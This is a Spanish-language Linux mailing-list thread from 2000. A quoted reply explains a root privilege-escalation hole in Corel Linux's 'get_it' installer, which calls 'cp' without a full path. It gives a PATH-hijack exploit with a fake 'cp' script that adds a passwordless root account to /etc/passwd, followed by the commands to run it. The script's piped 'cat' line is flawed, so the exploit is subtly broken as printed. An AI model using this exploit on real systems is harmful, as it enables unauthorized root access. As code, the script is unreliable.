Re: Re: [Sop.Tec.LinuxPPP] Aguas los usuarios de Corel Linux

Gracias, estoy haciendo lo que comentaste, estoy traduciendo, con algo de lentitud pero lo estoy haciendo, y como comentaba ya me inscribi en cursos de ingles.
Saludos
---- Principio del mensaje original ----
De:José Antonio Galicia <jcgalici en cbbanorte com mx>
Enviado:Fri, 14 Jan 2000 12:54:35 -0600 (CST)
Para:linux en pepe net mx
Asunto:Re: [Sop.Tec.LinuxPPP] Aguas los usuarios de Corel Linux

On Fri, 14 Jan 2000, ROMEO GUTIERREZ VASQEZ romeogutierrez wrote:

> ¿Que es esto?

 Que el instalador de paquetes .deb de corel linux tiene un serio problema
de seguridad: llama al programa "cp" sin darle la ruta completa por lo que
si cambiar tu path para que primero busque en un directorio que contenga
tu propia versión de "cp" y ya que se ejecuta en contexto de root puedes
hacer algo así:

	[yo@linux yo] export PATH=~yo/bin:$PATH
	[yo@linux yo] cat ~yo/bin/cp
	#!/bin/sh

	# Metodo chafa de hackear
	echo "dios::0:0:Mi cuenta de Dios:/root:/bin/bash" | \
	      cat /etc/passwd > ~yo/passwd
	mv -f ~yo/passwd /etc/passwd

	# y hacemos lo que debe hacer cp nomás por no dejar :)
	/bin/cp "$@"

	[yo@linux yo] /usr/X11R6/bin/get_it
	[yo@linux yo] su dios -
	[dios@linux yo] echo Ahora como Dios, todo lo veo...

 Recuerda que "get_it" es un programa para X.

> Por favor en español

 Si planeas usar linux es recomendable que aprendas inglés (o cuando menos
a "traducir" como lo hago yo :)

 Saludos,
 Toño.
---